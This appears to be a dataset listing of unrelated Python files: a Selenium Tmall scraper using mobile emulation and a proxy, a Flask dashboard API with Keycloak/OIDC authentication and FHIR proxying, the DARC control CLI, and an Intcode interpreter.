# be spelled "userAgent" (lower-case u) per the ChromeDriver mobile-emulation
# spec; the previous "UserAgent" is not a recognized key (the original inline
# comment already showed the correct spelling).
mobileEmulation = {"deviceMetrics": {"width": mWidth, "height": mHeight, "pixelRatio": PIXEL_RATIO},
                   "userAgent": random.choice(pcUA)}
def create_chrome():
    """Build a Chrome WebDriver configured for mobile emulation behind a proxy.

    :returns: a selenium ``webdriver.Chrome`` with 10 s page/script timeouts
        and the window sized to the emulated viewport.
    NOTE(review): the proxy address is hard-coded and free proxies expire —
    confirm 218.60.8.99:3129 is still reachable before running.
    """
    ops = webdriver.ChromeOptions()
    # Pretend to be a mobile device (viewport + UA from module-level mobileEmulation).
    ops.add_experimental_option('mobileEmulation', mobileEmulation)
    ops.add_argument('--proxy-server=218.60.8.99:3129')
    # ops.add_argument('--headless')
    # ops.add_argument('--disable-gpu')
    # NOTE(review): `chrome_options=` is deprecated in newer selenium
    # releases in favour of `options=`; kept as-is for compatibility.
    web = webdriver.Chrome(chrome_options=ops)
    web.set_page_load_timeout(10)
    web.set_script_timeout(10)
    web.set_window_size(mWidth, mHeight)
    return web
# Single module-level browser session shared by all page fetches below.
driver = create_chrome()
# NOTE(review): function name has a typo ("dirver"); kept because callers
# elsewhere in this file use the misspelled name.
def dirver_get_page(url):
    """Open *url* in the shared driver and dump its cookies and rendered HTML.

    The sleeps give Tmall's JavaScript (and any manual captcha solving in the
    visible browser window) time to finish before the page source is printed.
    """
    driver.maximize_window()
    # driver.get('https://detail.tmall.com/item.htm?id=584865383924&skuId=3951416717001&areaId=110100&user_id=902218705&cat_id=2&is_b=1&rn=289a6a85d6f5c3ca9cb4ea875d191f90&on_comment=1')
    driver.get(url)
    time.sleep(2)
    print(driver.get_cookies())
    # Long pause before dumping the page: rendering / manual interaction window.
    time.sleep(20)
    print(driver.page_source)
if __name__ == '__main__':
    # Ask the user for a search keyword and kick off the listing crawl.
    keyword = str(input('请输入关键字:'))
    search_template = (
        'https://list.tmall.com/search_product.htm'
        '?q={}+x&type=p&spm=a220m.1000858.a2227oh.d100&from=.list.pc_1_searchbutton'
    )
    first_page(search_template.format(keyword))
|
15,997 | da0658b5fc5ce8e077644d70ad73ceaba4001897 | from datetime import datetime
from flask import (
Blueprint,
abort,
current_app,
jsonify,
make_response,
request,
safe_join,
send_from_directory,
)
import requests
from werkzeug.exceptions import Unauthorized
from dashboard.bearer_auth import BearerAuth
from dashboard.extensions import oidc
# Blueprint grouping all dashboard API routes; registered by the app factory.
api_blueprint = Blueprint('dashboard-api', __name__)
def terminate_session():
    """Terminate logged in session; logout without response.

    If a valid access token is held, POST directly to Keycloak's logout
    endpoint (required to clear the KC-domain browser cookie), then clear
    the local session cookie via ``oidc.logout()``.
    """
    access_token = oidc.user_loggedin and oidc.get_access_token()
    if access_token and oidc.validate_token(access_token):
        # Direct POST to Keycloak necessary to clear KC domain browser cookie
        logout_endpoint = oidc.client_secrets['userinfo_uri'].replace(
            'userinfo', 'logout')
        form_data = {
            'client_id': oidc.client_secrets['client_id'],
            'client_secret': oidc.client_secrets['client_secret'],
            'refresh_token': oidc.get_refresh_token(),
        }
        requests.post(logout_endpoint, auth=BearerAuth(access_token), data=form_data)
    # clears local cookie only
    oidc.logout()
def validate_auth():
    """Verify state of auth token, raise 401 if inadequate

    :returns: access token, if valid
    :raises Unauthorized: when no token is available or it fails validation
    """
    try:
        access_token = oidc.get_access_token()
    except TypeError:
        # the oidc lib raises TypeError when the token isn't accessible
        raise Unauthorized("missing auth token")
    if oidc.validate_token(access_token):
        return access_token
    # Invalid token: tear down the stale session before rejecting.
    terminate_session()
    raise Unauthorized("invalid auth token")
# NOTE(review): the `methods=["GET"]` default parameter is dead weight —
# HTTP methods belong in the route decorator — but removing it would change
# the signature, so it is only flagged here.
@api_blueprint.route('/', methods=["GET"])
@oidc.require_login
def main(methods=["GET"]):
    """ Main route, entry point for react. """
    # Raises 401 (no redirect) if the session token is missing/invalid.
    validate_auth()
    ## issue with path resolution after build
    # NOTE(review): `safe_join` is imported from flask above; newer Flask
    # versions moved it to werkzeug.utils — confirm the pinned Flask version.
    return send_from_directory(
        #todo: remove templates directory reference; index.html isn't a jinja template
        safe_join(current_app.static_folder, 'templates'),
        'index.html',
        cache_timeout=-1
    )
@api_blueprint.route('/validate_token', methods=["GET"])
def validate_token():
    """API to confirm header token is still valid

    :returns: JSON with `valid` and `expires_in` (seconds) filled in
    """
    try:
        validate_auth()
    except Unauthorized:
        # No/invalid token: report as expired rather than erroring out.
        return jsonify(valid=False, expires_in=0)
    # Seconds until the token's `exp` claim passes.
    remaining = oidc.user_getfield('exp') - datetime.now().timestamp()
    return jsonify(valid=True, expires_in=remaining)
@api_blueprint.route('/<string:resource_type>', methods=["GET"])
def resource_bundle(resource_type, methods=["GET"]):
    """Query HAPI for resource_type and return as JSON FHIR Bundle

    NB not decorated with `@oidc.require_login` as that does an implicit
    redirect.  Client should watch for 401 and redirect appropriately.

    :param resource_type: The FHIR Resource type, i.e. `Patient` or `CarePlan`
    :param search criteria: Include query string arguments to pass to HAPI
      as additional search criteria.  Example: /CarePlan?subject=Patient/8
    """
    token = validate_auth()
    # Pull up to 1000 entries; caller-supplied args override/extend defaults.
    query = {'_count': 1000}
    query.update(request.args)
    response = requests.get(
        current_app.config.get('MAP_API') + resource_type,
        auth=BearerAuth(token),
        params=query)
    try:
        response.raise_for_status()
    except requests.exceptions.HTTPError as err:
        # Propagate HAPI's status code to our client.
        abort(err.response.status_code, err)
    return jsonify(response.json())
@api_blueprint.route(
    '/<string:resource_type>/<int:resource_id>', methods=["GET"])
def resource_by_id(resource_type, resource_id, methods=["GET"]):
    """Query HAPI for individual resource; return JSON FHIR Resource

    NB not decorated with `@oidc.require_login` as that does an implicit
    redirect.  Client should watch for 401 and redirect appropriately.
    """
    token = validate_auth()
    response = requests.get(
        f"{current_app.config.get('MAP_API')}{resource_type}/{resource_id}",
        auth=BearerAuth(token))
    try:
        response.raise_for_status()
    except requests.exceptions.HTTPError as err:
        # Propagate HAPI's status code to our client.
        abort(err.response.status_code, err)
    return jsonify(response.json())
@api_blueprint.route('/logout', methods=["GET"])
def logout(methods=["GET"]):
    """End the session (local + Keycloak) and confirm with a small HTML page."""
    terminate_session()
    return make_response(
        'Logged out. Return to <a href="/">Stayhome Dashboard</a>')
|
15,998 | 8f0a70c1dbcfedf0961c3290c83431b2ebf6e42f | #!/usr/bin/env python3
import os
import sys
from argparse import ArgumentParser, RawTextHelpFormatter
import yaml
import ast
import logging
import socket
import subprocess
import darc
from darc.definitions import CONFIG_FILE
# Module logger: bare messages to stdout, everything at DEBUG and above.
logger = logging.getLogger('darc.control')
_stdout_handler = logging.StreamHandler(sys.stdout)
_stdout_handler.setFormatter(logging.Formatter('%(message)s'))
logger.addHandler(_stdout_handler)
logger.setLevel(logging.DEBUG)
def send_command(timeout, service, command, payload=None, host='localhost', port=None):
    """
    Send a command to the DARC master service

    :param float timeout: Timeout for reply in seconds
    :param str service: Service to send command to
    :param str command: Which command to send
    :param str payload: Payload for command (optional)
    :param str host: Hostname to connect to (default: localhost)
    :param int port: Port to connect to (default: get from DARC config file)
    :return: reply from DARC master (dict or str), or None if the connection
        failed.  No reply is read for the 'stop_all' command, so it also
        returns None in that case.
    """
    # define message as literal python dict; the master parses it with
    # ast.literal_eval on its side
    if payload:
        message = "{{'service':'{}', 'command':'{}', 'payload':'{}'}}".format(service, command, payload)
    else:
        message = "{{'service':'{}', 'command':'{}'}}".format(service, command)
    if port is None:
        # read port from config
        with open(CONFIG_FILE, 'r') as f:
            master_config = yaml.load(f, Loader=yaml.SafeLoader)['darc_master']
        port = master_config['port']
    # connect to master
    try:
        master_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        master_socket.settimeout(timeout)
        master_socket.connect((host, port))
    except socket.error as e:
        logger.error("Failed to connect to DARC master: {}".format(e))
        return None
    reply = None
    try:
        # send message
        master_socket.sendall(message.encode())
        # receive reply unless stop_all was sent (the master does not answer it)
        if not command == 'stop_all':
            try:
                reply = master_socket.recv(1024).decode()
            except socket.timeout:
                logger.error("Did not receive reply before timeout")
            else:
                try:
                    reply = ast.literal_eval(reply)
                except Exception as e:
                    logger.error("Failed to parse message ({}): {}".format(reply, e))
                else:
                    if isinstance(reply, dict):
                        for key, value in reply.items():
                            logger.info("{}: {}".format(key, value))
                    else:
                        # bug fix: the reply used to be emitted twice (a stray
                        # print() plus this stdout logger); log it once
                        logger.info(reply)
    finally:
        # close connection even if sendall/recv raised unexpectedly
        # (previously the socket leaked on such errors)
        master_socket.close()
    return reply
def main():
    """
    DARC command line interface
    This function is called by the darc executable
    Run darc --help for usage
    """
    # Check available services in config
    with open(CONFIG_FILE, 'r') as f:
        config = yaml.load(f, Loader=yaml.SafeLoader)['darc_master']
    # The set of running services depends on the configured processing mode.
    if config['mode'] == 'real-time':
        services = config['services_master_rt'] + config['services_worker_rt']
    elif config['mode'] == 'mixed':
        services = config['services_master_mix'] + config['services_worker_mix']
    else:
        services = config['services_master_off'] + config['services_worker_off']
    master_commands = config['master_commands']
    service_commands = config['service_commands']
    # Deduplicate; NOTE(review): set() loses ordering, so --help lists
    # commands in arbitrary order — confirm that is acceptable.
    commands = list(set(master_commands + service_commands))
    # Parse arguments
    parser = ArgumentParser(formatter_class=RawTextHelpFormatter)
    parser.add_argument('--service', type=str, help="Which service to interact with, "
                        " available services: {}, or all".format(', '.join(services)))
    parser.add_argument('--timeout', type=int, default=10, help="Timeout for sending command "
                                                                "(Default: %(default)ss)")
    parser.add_argument('--host', type=str, default='localhost', help="Host to send command to "
                                                                      "(Default: %(default)s)")
    parser.add_argument('--port', type=int, help="Port DARC listens to "
                                                 "(Default: determine from DARC config file)")
    parser.add_argument('--parset', type=str, help="Observation parset (takes precedence over --config)")
    parser.add_argument('--config', type=str, help="Node observation config")
    parser.add_argument('--version', action="store_true", help="Print version info")
    parser.add_argument('cmd', type=str, nargs='*', help="Command to execute. When using get_attr, add space "
                                                         "followed by attribute. Available commands: "
                                                         "{}".format(', '.join(commands)))
    args = parser.parse_args()
    # Print version and exit
    if args.version:
        logger.info(f"{darc.__version__}")
        sys.exit(0)
    # Check arguments
    if not args.cmd:
        logger.error("Add command to execute e.g. \"darc --service amber_listener status\"")
        sys.exit(1)
    # First positional is the command; optional second is a get_attr attribute.
    cmd = args.cmd[0]
    try:
        attr = args.cmd[1]
    except IndexError:
        attr = None
    if cmd not in commands:
        logger.error("Unknown command: {}. Run darc -h to see available commands".format(cmd))
        sys.exit(1)
    elif not args.service and cmd not in master_commands:
        # Service-level commands always need a target service.
        logger.error("Argument --service is required for given command")
        sys.exit(1)
    # add attribute to command if get_attr is called
    if attr is not None:
        if cmd == 'get_attr':
            cmd += f" {attr}"
        else:
            logger.error("Attribute can only be provided when using get_attr command")
            sys.exit(1)
    # If command is edit, open config in an editor
    if cmd == 'edit':
        with open(CONFIG_FILE, 'r') as f:
            master_config = yaml.load(f, Loader=yaml.SafeLoader)['darc_master']
        default_editor = master_config['editor']
        # $EDITOR wins over the editor configured in the DARC config file.
        editor = os.environ.get('EDITOR', default_editor)
        ret = subprocess.Popen([editor, CONFIG_FILE]).wait()
        if ret != 0:
            logger.error("Editor did not exit properly")
        else:
            logger.info("Restart services to apply new settings, or run 'darc reload' to reload the master config.\n"
                        "WARNING: Restarting services aborts any running observation.\n"
                        "For services without queue server (i.e. all except LOFARTrigger and VOEventGenerator),\n"
                        "the config is automatically reloaded at the start of each observation.")
        sys.exit(ret)
    # Get payload (parset takes precedence over node config)
    if args.parset:
        payload = args.parset
    elif args.config:
        payload = args.config
    else:
        payload = None
    # Exit non-zero when the master could not be reached / gave no reply.
    if not send_command(args.timeout, args.service, cmd, host=args.host, port=args.port, payload=payload):
        sys.exit(1)
|
class Computer:
    """Minimal Intcode-style interpreter (Advent of Code 2019, day 2).

    The program is a flat list of ints: opcode 1 = add, 2 = multiply,
    99 = halt.  Add/multiply read two operand *positions* and store the
    result at a third position; each such instruction is 4 cells wide.
    """

    def __init__(self, commandArray, resultPosition):
        # Program memory, mutated in place as instructions execute.
        self.data = commandArray
        # Cell whose value is reported when the program halts.
        self.resultPosition = resultPosition
        # Instruction pointer and the width of the previously executed
        # instruction.  Fix: kept per-instance in __init__ rather than as
        # shared class attributes, so multiple Computer instances cannot
        # interfere with each other's execution state.
        self.position = 0
        self.nextStep = 0

    def _operand(self, offset):
        """Return the value referenced (position mode) by cell ip+offset."""
        return self.data[self.data[self.position + offset]]

    def addition(self):
        """Opcode 1: data[target] = operand1 + operand2; returns the memory."""
        self.data[self.data[self.position + 3]] = self._operand(1) + self._operand(2)
        self.nextStep = 4
        return self.data

    def multiplication(self):
        """Opcode 2: data[target] = operand1 * operand2; returns the memory."""
        self.data[self.data[self.position + 3]] = self._operand(1) * self._operand(2)
        self.nextStep = 4
        return self.data

    def close_computer(self):
        """Opcode 99: print the result cell and signal halt by returning False."""
        print("Result:")
        print(self.data[self.resultPosition])
        print("Done with execution!")
        return False

    # Opcode dispatch table: plain (unbound) functions, invoked with the
    # instance passed explicitly in next().
    commands = {
        1: addition,
        2: multiplication,
        99: close_computer,
    }

    def next(self):
        """Advance the instruction pointer and execute one instruction.

        :returns: the memory list after add/multiply, or False once halted.
        :raises KeyError: on an unknown opcode.
        """
        self.position = self.nextStep + self.position
        command = self.data[self.position]
        return self.commands[command](self)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.